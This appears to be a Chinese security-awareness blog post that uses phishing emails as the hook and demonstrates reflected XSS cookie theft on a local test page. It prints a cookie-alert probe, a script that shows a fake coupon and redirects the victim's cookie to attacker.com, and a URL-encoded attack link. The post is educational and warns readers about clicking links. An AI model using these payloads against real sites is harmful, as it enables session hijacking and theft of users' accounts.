不要再被这种邮件攻击坑了

今天来分享一个常见的恶意邮件的形态以及其原理。

垃圾邮件应该是网络人日常生活中屡见不鲜的一个插曲,但是今天要分享的是垃圾邮件中的高级手法,很容易蒙骗你的双眼。

图片

上面的邮件形式也是网络上惯用的一种恶意邮件的方式,其实如果用户能够仔细查看发件人信息,再去核实发件人的邮箱地址,便能很容易识别出来究竟是来自于可靠的发件人还是恶意冒充,但是往往大部分人在看邮件的时候,都是先看主题信息,尤其当看到主题信息和正文部分是比较官方的书面语,就不由自主陷入了圈套中。

当点击了邮件中的恶意链接或者下载了邮件中的文档,就会有很大几率点进了用户的恶意网站或者泄漏了自身的信息,下面来讲讲这种攻击手法的现象和原理。

图片

在网络安全史上流传着一种叫做跨站脚本攻击的手段,称为XSS(Cross Site Script)攻击。主要是通过引导用户去点击一个攻击者构造的恶意链接,进而达到窃取用户信息的目的,以一个常见的窃取用户cookie的例子来做演示。

假设有一个你经常要访问的网站,几乎每天都会访问几次,客流量也非常大,但是有一天黑客发现了这个网站上存在某种漏洞,通过该漏洞,就能获取其他用户的cookie信息。
(Cookie是什么?是浏览器端用来为了识别http请求中用户身份信息而采取的一种身份识别机制,通过cookie就能准确识别是哪位用户发了请求,而cookie中也就存粗了用户的私密会话信息,属于用户隐私)

图片

我们假设用户的登录网站长这样:

图片

被黑客发现,当输入一段代码到输入框里后,居然可以执行:

图片
图片

既然能够执行一个script脚本,那么任何的script脚本都会被执行,于是再次尝试一段脚本输入:

<script>alert(document.cookie)</script>
图片
图片

可以看到,打印出了cookiet信息,一个漏洞点已经暴露出来了,攻击者来构造出下面这段代码:

<script>  alert('恭喜您获得了一张满100减20的优惠券');  location.href="https://attacker.com?cookie="+document.cookie;</script>

这段代码首先弹出一个对话框,以一句非常引人注目、符合用户贪利心理的语句来做伏笔:

图片


当点击OK按钮后,就会重定向到attacker.com这个网站,并把用户的cookie信息传了过去,如果attacker.com就是攻击者精心构造的一个服务器,专门用来接收用户的cookie信息。

最后,当以上的攻击测试成功后,就能获取到一个精心构造的URL:

http://localhost/xss_get.php?firstname=test&lastname=%3Cscript%3Ealert%28%27%E6%81%AD%E5%96%9C%E6%82%A8%E8%8E%B7%E5%BE%97%E4%BA%86%E4%B8%80%E5%BC%A0%E6%BB%A1100%E5%87%8F20%E7%9A%84%E4%BC%98%E6%83%A0%E5%88%B8%E2%80%8B%27%29%3Blocation.href%3D%22https%3A%2F%2Fwww.baidu.com%3Fcookie%3D%22%2Bdocument.cookie%3B+%3C%2Fscript%3E&form=submit

这个网址是在本地构造的一个攻击小例子,实际场景中,这里的localhost会被替换成一个官网的地址,用户一看是自己数字的网站地址,便会毫无犹豫点进去,于是就中招了。

图片


以上通过简单模拟一个常用的XSS漏洞攻击的小案例,也是告诉大家,网络世界,纷繁复杂,当遇到这种不确定的链接或者信息的时候,千万不要随意点击,以免进坑。

声明:文中观点不代表本站立场。本文传送门:http://eyangzhen.com/247236.html

(0)
联系我们
联系我们
分享本页
返回顶部